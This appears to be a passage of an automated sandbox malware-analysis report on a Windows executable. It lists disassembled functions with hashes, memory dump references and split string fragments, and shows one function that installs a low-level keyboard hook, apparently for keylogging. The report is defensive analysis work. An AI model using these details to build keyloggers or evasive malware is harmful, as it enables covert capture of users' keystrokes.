                                                                                                      • Opcode Fuzzy Hash: 556d78595065429114074fbdab265b4be9bfb1b2001a4eeb08d27f6d5e4d7e03
                                                                                                      • Instruction Fuzzy Hash: FC8123A2E146949EF7208A25EC04BEA7775EB90300F1841FAD40DAB2C1D67E4FD58F26
                                                                                                      Function 0040626C Relevance: 17.7, Strings: 14, Instructions: 208COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                                                                                      • API String ID: 0-225289630
                                                                                                      • Opcode ID: 3a70612e9eb2019a8b99f3cdc8b0fb295ae6293d963ae87928d599a356d4137a
                                                                                                      • Instruction ID: 0b3ede46d209881819c49433d054fb3f506931572d5cf7decbe80a5f2574682a
                                                                                                      • Opcode Fuzzy Hash: 3a70612e9eb2019a8b99f3cdc8b0fb295ae6293d963ae87928d599a356d4137a
                                                                                                      • Instruction Fuzzy Hash: 0A8123A2E146949EF7208A25EC04BEA7775EB90300F1841FAD40DAB2C1D67E4FD58F26
                                                                                                      Function 00406215 Relevance: 17.7, Strings: 14, Instructions: 208COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                                                                                      • API String ID: 0-225289630
                                                                                                      • Opcode ID: 14eb0f0ccfffd754ddd1f98b8c603b87a1f9131b91d00e7b6e8878eefcdf56ff
                                                                                                      • Instruction ID: db6b7e474548adce3ee78f1635b8291c19243602f5135dfbba0a7150edeb13f7
                                                                                                      • Opcode Fuzzy Hash: 14eb0f0ccfffd754ddd1f98b8c603b87a1f9131b91d00e7b6e8878eefcdf56ff
                                                                                                      • Instruction Fuzzy Hash: 8B8123A2E146949EF7208A25EC04BEA7775EB90300F1841FAD40DAB2C1D67E4FD58F26
                                                                                                      Function 0040650D Relevance: 17.7, Strings: 14, Instructions: 200COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                                                                                      • API String ID: 0-225289630
                                                                                                      • Opcode ID: 884f8bbb9d47917f9221c6b20e550bb208bf5364b25ca03486401a378c6b5b0d
                                                                                                      • Instruction ID: 8ec3889210661216cdcc2601c49f6a64ada024a1e34ff59965f6938de3a130dd
                                                                                                      • Opcode Fuzzy Hash: 884f8bbb9d47917f9221c6b20e550bb208bf5364b25ca03486401a378c6b5b0d
                                                                                                      • Instruction Fuzzy Hash: 347134A2E146949AF7218725EC08BEA7775EF91300F1841FAD40DAB2C1D67E4FD58F22
                                                                                                      Function 00406521 Relevance: 17.7, Strings: 14, Instructions: 199COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: P$V$a$c$e$i$l$o$r$r$t$t$t$u
                                                                                                      • API String ID: 0-225289630
                                                                                                      • Opcode ID: 80121c0711c13a61b02c01869e57273196434cc66afeaeede552f4e051e527fe
                                                                                                      • Instruction ID: 30079997a538910ffa5175a5a41b4270505db1630147ff7007f27e3c8bddba1d
                                                                                                      • Opcode Fuzzy Hash: 80121c0711c13a61b02c01869e57273196434cc66afeaeede552f4e051e527fe
                                                                                                      • Instruction Fuzzy Hash: 957133A2E146989AF7218725EC04BEA7775EF91300F1841FAD40DAB2C1D67E4FD58F22
                                                                                                      Function 00405465 Relevance: 16.5, Strings: 13, Instructions: 204COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ;CG;$L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 0-1240095429
                                                                                                      • Opcode ID: 5be35c8eb73262fd403f16de8fecd5f1710522af66a166f500431509d0009079
                                                                                                      • Instruction ID: 2fef6c7d368c7dd8a5551a57fd48717e77ee0aa75c6f737aa5e3ee0657fbfb4b
                                                                                                      • Opcode Fuzzy Hash: 5be35c8eb73262fd403f16de8fecd5f1710522af66a166f500431509d0009079
                                                                                                      • Instruction Fuzzy Hash: FD81A071D085688AEB20CB24DC40BEAB6B5FF55300F0481FAD44CA7391D67A4FC58FA5
                                                                                                      Function 00405070 Relevance: 15.2, Strings: 12, Instructions: 189COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 0-4069139063
                                                                                                      • Opcode ID: 5dd8f01ab53d075c51d2b031f5e48206847bc023751776440bb2e69885f60e11
                                                                                                      • Instruction ID: 12a3efea09a4e6da1333f352208c3c9a754c93dc2d5a6d87535ea62fa6ba01cd
                                                                                                      • Opcode Fuzzy Hash: 5dd8f01ab53d075c51d2b031f5e48206847bc023751776440bb2e69885f60e11
                                                                                                      • Instruction Fuzzy Hash: DE718371D146589AF7208B24DC447EA66B9EF54300F0881F9D44CE7291D67F4FC58BAA
                                                                                                      Function 00405223 Relevance: 15.1, Strings: 12, Instructions: 106COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: L$L$W$a$a$b$d$i$o$r$r$y
                                                                                                      • API String ID: 0-4069139063
                                                                                                      • Opcode ID: 31569a4a9475e5278292d78f2ed26837217672bb4255b3768c0da9005a8d9825
                                                                                                      • Instruction ID: 0766521a756723d9176c2d3fd23029524b88314795d56466a3ed5f8d3e5d909c
                                                                                                      • Opcode Fuzzy Hash: 31569a4a9475e5278292d78f2ed26837217672bb4255b3768c0da9005a8d9825
                                                                                                      • Instruction Fuzzy Hash: F8418171D186988AE7208A24CC447EA76B5EF55300F0885F9C48CE7291D6BF4BD68FA6
                                                                                                      Function 00401034 Relevance: 13.1, Strings: 10, Instructions: 618COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: 3633$7G=Y$8$I:@8$O2G>$Q$S$n$n$x
                                                                                                      • API String ID: 0-3480641333
                                                                                                      • Opcode ID: cd5636a29d65098b4e95513b6214aacdf8160396285940ae7817196079e007bb
                                                                                                      • Instruction ID: d6c8cd4d78ab8eced7fa7535b172e5a3a9157ff544fcd4366042850fbadd64aa
                                                                                                      • Opcode Fuzzy Hash: cd5636a29d65098b4e95513b6214aacdf8160396285940ae7817196079e007bb
                                                                                                      • Instruction Fuzzy Hash: 563249B2D042549BF728CB24DD85AEFBB79EF80304F1481BFE409AA1D0D6795B85CE52
                                                                                                      Function 00426601 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 40windowCOMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                        • Part of subcall function 0042666F: UnhookWindowsHookEx.USER32(?), ref: 00426679
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00426616
                                                                                                      • SetWindowsHookExW.USER32(0000000D,0041ED8B,00000000,00000000), ref: 00426625
                                                                                                      • GetLastError.KERNEL32 ref: 00426634
                                                                                                      • FormatMessageW.KERNEL32(00001100,00000000,00000000,00000000,?,00000000,00000000), ref: 00426648
                                                                                                      • MessageBoxW.USER32(00000000,?,Error hooking keyboard,00000010), ref: 0042665D
                                                                                                      • LocalFree.KERNEL32(?), ref: 00426666
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HookMessageWindows$ErrorFormatFreeHandleLastLocalModuleUnhook
                                                                                                      • String ID: Error hooking keyboard
                                                                                                      • API String ID: 3539256350-2780107085
                                                                                                      • Opcode ID: fba2087d46c83467c84a28cd1e6aaa1c58a2a6ec1ea7a2086610efa25594ff7a
                                                                                                      • Instruction ID: f5ea2c017abb1ba6b0e2630cac6da38f566bcf030e92f02af746c3b95a68221d
                                                                                                      • Opcode Fuzzy Hash: fba2087d46c83467c84a28cd1e6aaa1c58a2a6ec1ea7a2086610efa25594ff7a
                                                                                                      • Instruction Fuzzy Hash: AEF09672501130FBDB201BA1AC4DEEF3E6DEF09751F101026F506A0091DBB45940EBF8
                                                                                                      Function 0043271F Relevance: 12.3, APIs: 1, Strings: 6, Instructions: 33COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      • GetLocaleInfoW.KERNEL32(00000400,7123456,00000000,000001F3), ref: 00432790
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2265076970.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2265018151.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265190462.000000000043C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265230103.0000000000444000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000481000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265316838.0000000000499000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265411115.000000000049E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265562091.000000000053F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265612620.0000000000543000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265711106.000000000054C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265749349.000000000054F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265817662.0000000000554000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265870723.0000000000558000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265949582.000000000055E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2265988893.0000000000563000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266051326.0000000000593000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                      • Associated: 00000000.00000002.2266092935.0000000000597000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
